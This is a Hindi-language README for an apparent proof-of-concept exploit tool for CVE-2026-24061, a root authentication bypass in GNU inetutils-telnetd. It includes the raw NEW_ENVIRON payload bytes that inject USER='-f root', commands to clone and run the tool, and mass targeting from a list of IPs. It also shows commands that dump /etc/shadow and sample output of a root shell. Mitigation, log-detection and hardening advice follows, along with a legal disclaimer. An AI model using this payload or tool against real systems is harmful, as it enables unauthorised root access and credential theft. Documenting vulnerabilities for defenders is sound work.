
प्रूफ ऑफ कॉन्सेप्ट: CVE-2026-24061 GNU inetutils-telnetd में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है जो अनधिकृत दूरस्थ हमलावरों को दुर्भावनापूर्ण NEW_ENVIRON टेलनेट विकल्प शोषण के माध्यम से तुरंत रूट शेल एक्सेस प्राप्त करने की अनुमति देता है।
CVE-2026-24061 का शोषण करने के लिए एक सुरक्षा अनुसंधान उपकरण, जो GNU inetutils-telnetd में एक गंभीर दूरस्थ प्रमाणीकरण बाईपास भेद्यता है, जो बिना प्रमाणीकरण के तत्काल रूट शेल एक्सेस की अनुमति देता है।
GNU inetutils-telnetd में संस्करण 2.7 तक एक गंभीर भेद्यता मौजूद है जो अप्रमाणित दूरस्थ हमलावरों को प्रमाणीकरण को पूरी तरह से बायपास करने और तत्काल रूट शेल एक्सेस प्राप्त करने की अनुमति देती है। इस भेद्यता का शोषण NEW_ENVIRON टेलनेट विकल्प के माध्यम से एक विशेष रूप से तैयार USER पर्यावरण चर को मान "-f root" के साथ इंजेक्ट करके किया जाता है, जो सभी प्रमाणीकरण तंत्रों को बायपास कर देता है।
| संस्करण श्रेणी | स्थिति |
|---|---|
| <= 2.7 | कमजोर |
| > 2.7 | पैच स्थिति निर्धारित की जानी है (TBD) |
यह भेद्यता telnetd के NEW_ENVIRON विकल्प हैंडलर में USER पर्यावरण चर के अनुचित सत्यापन से उत्पन्न होती है। NEW_ENVIRON टेलनेट विकल्प को संसाधित करते समय, telnetd सेवा USER चर मान को लॉगिन प्रक्रिया में भेजने से पहले सैनिटाइज करने में विफल रहती है। USER को "-f root" पर सेट करके, हमलावर कमांड-लाइन तर्क इंजेक्ट करता है जो बिना क्रेडेंशियल्स के रूट उपयोगकर्ता के लिए प्रमाणीकरण को सफल करने के लिए मजबूर करता है।
सभी निर्भरताएँ Python की मानक लाइब्रेरी का हिस्सा हैं:
# रिपॉजिटरी क्लोन करें
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061
# शोषण चलाएँ
python3 main.py -u <target_ip>
# शोषण डाउनलोड करें
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py
# इसे निष्पादन योग्य बनाएँ (Linux/macOS)
chmod +x main.py
# शोषण चलाएँ
python3 main.py -u <target_ip>
# सुनिश्चित करें कि Python 3.7+ स्थापित है
python3 --version
# डाउनलोड करें और चलाएँ
python3 main.py -u <target_ip>
Usage:
python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
echo "commands" | python3 main.py -u <target_ip>
Arguments:
-u एकल लक्ष्य IP पता या होस्टनाम
-l लक्ष्य IP वाली फ़ाइल का पथ (प्रति पंक्ति एक)
-p लक्ष्य पोर्ट (डिफ़ॉल्ट: 23)
-usr शोषण के लिए उपयोगकर्ता (डिफ़ॉल्ट: root)
एकल telnetd इंस्टेंस का शोषण करें:
# मूल शोषण (डिफ़ॉल्ट पोर्ट 23, उपयोगकर्ता root)
python3 main.py -u 192.168.1.100
# कस्टम पोर्ट
python3 main.py -u 192.168.1.100 -p 2323
# भिन्न उपयोगकर्ता
python3 main.py -u 192.168.1.100 -usr admin
गैर-इंटरैक्टिव रूप से कमांड निष्पादित करें:
# एकल कमांड
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100
# एकाधिक कमांड
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100
# आउटपुट रीडायरेक्शन के साथ कमांड
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100
फ़ाइल से एकाधिक लक्ष्यों का शोषण करें:
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin
लक्ष्य फ़ाइल प्रारूप (targets.txt):
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com
नोट्स:
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass ║
║ ║
║ CVSS Score: 9.8 (Critical) ║
║ Impact: Remote Authentication Bypass - Instant Root Shell ║
║ ║
║ This tool is part of the HGrab Framework. ║
╚═══════════════════════════════════════════════════════════════╝
[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
शोषण टेलनेट प्रोटोकॉल वार्ता चरण का लाभ उठाता है:
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39
payload = bytes([
255, # IAC
250, # SB
39, # NEW_ENVIRON
0, # IS
0, # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
255, # IAC
240 # SE
])
select.select() का उपयोग करता हैtelnetd अक्षम करें: telnetd सेवा को तुरंत रोकें और अक्षम करें
# systemd-आधारित सिस्टम
sudo systemctl stop telnetd
sudo systemctl disable telnetd
# xinetd-आधारित सिस्टम
sudo service xinetd stop
sudo chkconfig telnet off
फ़ायरवॉल नियम: फ़ायरवॉल स्तर पर टेलनेट पोर्ट (23) को ब्लॉक करें
# iptables
sudo iptables -A INPUT -p tcp --dport 23 -j DROP
# firewalld
sudo firewall-cmd --permanent --remove-service=telnet
sudo firewall-cmd --reload
नेटवर्क अलगाव: इंटरनेट-फ़ेसिंग सिस्टम से टेलनेट सेवा हटाएँ
टेलनेट के बजाय SSH का उपयोग करें:
# OpenSSH सर्वर स्थापित करें
sudo apt-get install openssh-server # Debian/Ubuntu
sudo yum install openssh-server # RHEL/CentOS
# SSH सक्षम करें और प्रारंभ करें
sudo systemctl enable sshd
sudo systemctl start sshd
# सत्यापित करें कि telnetd चल नहीं रहा है
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23
# यदि ठीक से अक्षम किया गया है तो कोई परिणाम नहीं लौटना चाहिए
निम्नलिखित पैटर्न के लिए सिस्टम लॉग की समीक्षा करें:
प्रमाणीकरण लॉग:
# असामान्य लॉगिन पैटर्न की जाँच करें
sudo grep telnetd /var/log/auth.log
sudo grep telnetd /var/log/secure
# संदिग्ध USER पर्यावरण चर की तलाश करें
sudo grep "USER.*-f" /var/log/auth.log
नेटवर्क लॉग:
# सक्रिय टेलनेट कनेक्शन की जाँच करें
sudo netstat -antp | grep :23
# हाल के रूट लॉगिन की समीक्षा करें
sudo last | grep root
# संशोधित सिस्टम फ़ाइलों की जाँच करें
sudo rpm -Va # RHEL/CentOS
sudo debsums -c # Debian/Ubuntu
# रूट द्वारा प्रक्रियाओं की सूची बनाएँ
sudo ps aux | grep root
# अनधिकृत SSH कुंजियों की जाँच करें
sudo cat /root/.ssh/authorized_keys
महत्वपूर्ण: उपयोग से पहले पढ़ें
यह उपकरण केवल इसके लिए प्रदान किया गया है:
निषिद्ध उपयोग:
दायित्व: इस सॉफ़्टवेयर के लेखक, योगदानकर्ता और वितरक इस उपकरण के साथ किए गए दुरुपयोग, क्षति या अवैध गतिविधियों के लिए कोई जिम्मेदारी या देयता स्वीकार नहीं करते हैं। उपयोगकर्ता पूरी तरह से इसके लिए जिम्मेदार हैं:
कानूनी सूचना: कंप्यूटर सिस्टम तक अनधिकृत पहुँच एक गंभीर आपराधिक अपराध है। उल्लंघन के परिणामस्वरूप इसके तहत अभियोजन हो सकता है:
दंड में कारावास, भारी जुर्माना और नागरिक देयता शामिल हो सकती है।
इस उपकरण का उपयोग करके, आप स्वीकार करते हैं कि आपने इस अस्वीकरण और सभी लागू कानूनों को पढ़ लिया है, समझ लिया है, और उनका पालन करने के लिए सहमत हैं।
| संस्करण | तिथि | परिवर्तन |
|---|---|---|
| 1.0.0 | 2026-01-23 | प्रारंभिक रिलीज़ |
प्रश्नों, समस्याओं या योगदान के लिए:
यह प्रोजेक्ट केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए यथावत प्रदान किया गया है। कोई वारंटी, व्यक्त या निहित नहीं है। अपने जोखिम पर और सभी लागू कानूनों और विनियमों के अनुसार उपयोग करें।
केवल उचित प्राधिकरण के साथ उपयोग करें
| फ़ील्ड | मान |
|---|
| CVE पहचानकर्ता | CVE-2026-24061 |
| CVSS v3.1 स्कोर | 9.8 (गंभीर) |
| CVSS वेक्टर | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE वर्गीकरण | CWE-88: कमांड में तर्क सीमांकक का अनुचित निष्प्रभावीकरण |
| विक्रेता | GNU परियोजना |
| उत्पाद | inetutils-telnetd |
| प्रकटीकरण तिथि | 20 जनवरी, 2026 |
| पैच उपलब्ध | निर्धारित किया जाना है (TBD) |
| पैकेज | उद्देश्य |
|---|
| socket | नेटवर्क संचार |
| select | I/O मल्टीप्लेक्सिंग |
| sys | सिस्टम इंटरैक्शन |
| os | ऑपरेटिंग सिस्टम इंटरफ़ेस |
| threading | समवर्ती लक्ष्य शोषण |
| datetime | टाइमस्टैम्प फ़ॉर्मेटिंग |
| संकेतक | रंग | विवरण |
|---|
[SUCCESS] | हरा | लक्ष्य से सफलतापूर्वक जुड़ा |
[EXPLOIT] | हरा | शोषण पेलोड सफलतापूर्वक भेजा गया |
[INFO] | नीला | वर्तमान ऑपरेशन के बारे में सूचनात्मक संदेश |
[ERROR] | लाल | कनेक्शन विफलता, टाइमआउट, या शोषण त्रुटि |
[WARNING] | पीला | चेतावनी संदेश (वर्तमान में उपयोग नहीं किया गया) |
| कार्रवाई | प्राथमिकता | विवरण |
|---|
| SSH माइग्रेशन | महत्वपूर्ण | रिमोट एक्सेस के लिए टेलनेट को SSH से बदलें |
| पैच प्रबंधन | महत्वपूर्ण | सुरक्षा अपडेट की निगरानी करें और लागू करें |
| सेवा ऑडिट | उच्च | अनावश्यक नेटवर्क सेवाओं की पहचान करें और अक्षम करें |
| नेटवर्क विभाजन | उच्च | महत्वपूर्ण सिस्टम को सार्वजनिक नेटवर्क से अलग करें |
| घुसपैठ का पता लगाना | मध्यम | शोषण प्रयासों का पता लगाने के लिए IDS/IPS तैनात करें |
| एक्सेस नियंत्रण | मध्यम | रिमोट सेवाओं के लिए IP श्वेतसूची लागू करें |